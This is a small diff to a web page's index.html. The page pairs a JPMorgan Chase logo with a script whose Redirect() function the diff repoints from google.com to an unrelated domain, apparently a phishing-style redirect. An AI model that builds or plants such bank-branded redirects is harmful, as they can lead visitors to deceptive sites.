--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 <p><img alt="Make My Website" src="https://en.wikipedia.org/wiki/JPMorgan_Chase#/media/File:JP_Morgan_logo.jpg" style="width: 250px; height: 104px;" /><script type="text/javascript">
 
 function Redirect() {
-    window.location.href = "https://google.com";
+    window.location.href = "https://privatelabelgrw.com/";
 }
 
 document.write(".");
